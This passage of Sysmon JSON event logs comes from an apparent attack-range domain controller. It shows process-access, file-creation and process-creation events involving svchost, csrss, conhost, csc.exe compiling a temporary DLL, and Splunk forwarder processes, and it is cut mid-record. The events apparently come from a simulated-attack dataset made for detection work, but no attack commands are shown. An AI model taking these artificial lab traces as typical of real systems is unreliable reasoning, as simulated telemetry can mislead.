06:54:57.052","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4810,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.052\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.052","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4811,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.052\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.052","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4812,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.052\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1188-5F25-0000-0010903C0600}\r\nTargetProcessId: 2520\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.052","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1188-5F25-0000-0010903C0600}","TargetProcessId":"2520","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4813,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.052\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.052","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4814,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.052\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.052","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4815,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.052\r\nSourceProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010A36F0600}\r\nSourceProcessId: 1492\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1188-5F25-0000-0010903C0600}\r\nTargetProcessId: 2520\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.052","SourceProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010A36F0600}","SourceProcessId":"1492","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1188-5F25-0000-0010903C0600}","TargetProcessId":"2520","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4816,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:54:57.052\r\nProcessGuid: {E2A3D6B1-11C0-5F25-0000-0010B2910600}\r\nProcessId: 2312\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\u1pdf52i.dll\r\nCreationUtcTime: 2020-08-01 06:54:56.677","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:54:57.052","ProcessGuid":"{E2A3D6B1-11C0-5F25-0000-0010B2910600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\u1pdf52i.dll","CreationUtcTime":"2020-08-01 06:54:56.677","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4817,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.240\r\nProcessGuid: {E2A3D6B1-11C1-5F25-0000-0010AC970600}\r\nProcessId: 3220\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.240","ProcessGuid":"{E2A3D6B1-11C1-5F25-0000-0010AC970600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4818,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.239\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-11C1-5F25-0000-0010AC970600}\r\nTargetProcessId: 3220\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.239","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-11C1-5F25-0000-0010AC970600}","TargetProcessId":"3220","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program 